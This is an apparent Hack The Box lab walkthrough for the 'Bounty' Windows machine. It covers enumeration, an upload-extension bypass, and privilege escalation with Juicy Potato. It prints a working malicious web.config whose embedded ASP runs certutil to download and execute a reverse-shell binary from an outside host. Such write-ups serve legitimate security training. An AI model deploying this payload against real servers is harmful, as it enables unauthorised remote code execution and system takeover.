Hack The Box – Bounty Walkthrough
Introduction
This was an easy Windows machine that involved uploading a web.config file onto a Windows ASP web server to gain remote code execution and exploiting token impersonation to escalate privileges to system.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
The scan has identified only port 80 as open, so the next logical step would be to start enumerating HTTP.
Enumerating HTTP
When accessing the web server on port 80 through a browser, the following page comes up:
The above isn’t very helpful unfortunately, so the next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:
- dir to specify the scan should be done against directories and files
- -u to specify the target URL
- -w to specify the word list to use
- -x to specify the extensions to enumerate
The scan has identified a transfer.aspx entry, visiting the file takes to a file upload page:
After trying a few common executable extensions such as asp and aspx without success, decided to instead use Burp intruder to identify which extensions are allowed. Intercepting the file upload request:
Sending the request to intruder:
Selecting the file extension as the only parameter to use replace with the payload:
Modifying the raft-small-extensions.txt wordlist from SecLists, removing the dot to avoid Burp from URL-encoding it:
In the payloads tab, selecting “Runtime file” as payload type and choosing the wordlist:
It appears that one of the allowed extensions is config:
In Windows ASP, web.config files allow you to you customize the way your site or page on your site behaves. This files may also allow to run arbitrary ASP code in the context of the web application. This article explains in-depth how these web.config files can be exploited
Exploiting Web.config to gain RCE
The first step is to generate some shellcode using MSFvenom with the following flags:
- -p to specify the payload type, in this case, the Windows TCP reverse shell
- LHOST to specify the localhost IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format for the shell, in this case, exe
Creating the following web.config file, which will execute the Certutil utility and download and execute the reverse shell generated above:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!--
<%
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.10.14.3/exploit.exe C:\users\public\exploit.exe && C:\users\public\exploit.exe")
Response.write(output1)
%>
-->
Uploading the web.config file:
Setting up a Python web server to host the reverse shell:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
Navigating to the web.config file:
The reverse shell was successfully downloaded:
A call back on the listener was received, granting a reverse shell:
Privilege Escalation
When running “whoami /priv” on the box, it appears teh current user has the “SeImpersonatePrivilege”, which means that token impersonation could be exploited to escalate privileges:
Using Wget to download the Juicy Potato binary:
Using Certutil and the Python web server to transfer it to the victim machine:
A valid CLSID is required for the exploit to work, using the systeminfo command to check the Operating System:
A number of CLSID are available for Windows Server 2008 R2 on the Juicy Potato GitHub repository:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
Executing Juicy Potato using the following flags:
- -l to specify the COM server listen port
- -p to specify the program to launch, in this case, the previously created reverse shell
- -t to specify the createprocess call, in this case, both CreateProcessWithToken and CreateProcessAsUser
- -c to specify the CLSID, in this case, the one found in GitHub for Windows Server 2008 R2
The exploit successfully executed the reverse shell as system, granting a SYSTEM-level privileged shell.
Conclusion
This box was really, as it wasn’t the usual asp/aspx/ashx web shell upload, as it involved quite a bit of research to find out about web.config files and how to exploit them, I definitely learned something new doing this challenge and I am sure most of the other users who completed it did too.